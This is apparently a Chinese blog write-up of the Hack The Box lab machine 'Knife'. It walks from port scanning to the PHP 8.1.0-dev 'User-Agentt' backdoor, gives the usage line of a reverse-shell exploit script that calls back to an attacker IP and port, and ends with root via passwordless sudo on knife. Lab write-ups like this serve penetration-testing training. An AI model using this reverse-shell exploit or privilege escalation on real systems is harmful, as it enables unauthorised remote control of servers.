Linux/Knife

Knife

Enumeration

nmap

第一次扫描发现系统对外开放了22和80端口,端口详细信息如下

系统对外开放了2个端口,22的ssh和80的http,先访问web看看

单看该服务,并没有发现有趣的东西,wappalyzer显示php版本为8.1.0

PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution

搜索发现该版本php存在后门漏洞,可以远程执行代码

首先将该漏洞利用脚本下载到工作目录,我这里用了github的脚本

然后执行python脚本,输入url,本机ip,设置监听端口,在本地开启监听,然后执行python脚本

复制代码
usage: revshell_php_8.1.0-dev.py [-h] <target URL> <attacker IP> <attacker PORT> python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.3 4444

在python执行界面中没有反应,但是监听端获取到shell

Privilege Escalation

直接使用sudo -l发现可以使用root权限执行knife程序,且不需要密码

在gtfobins中发现knife可以利用,如图

执行指令即可获取root权限

相关推荐
黄沐阳2 小时前
stp,rstp,mstp的区别
服务器·网络·php
一张假钞2 小时前
Ubuntu SSH 免密码登陆
linux·ubuntu·ssh
Wang's Blog3 小时前
Linux小课堂: 文件操作警惕高危删除命令与深入文件链接机制
linux·运维·服务器
水月wwww4 小时前
操作系统——进程管理
linux·操作系统·vim·进程·进程调度
我科绝伦(Huanhuan Zhou)5 小时前
分享一个可以一键制作在线yum源的脚本
linux·运维
Paper_Love5 小时前
Linux-查看硬件接口软件占用
linux·运维·服务器
wydaicls6 小时前
Linux 系统下 ZONE 区域的划分
linux·运维·服务器
带土16 小时前
17. Linux wc命令
linux
螺旋小蜗6 小时前
Linux Cgroup与Device Whitelist详解
linux·运维·服务器·cgroup
mjhcsp6 小时前
博客安全攻防演练:从实战视角构建全方位防护体系
网络安全·博客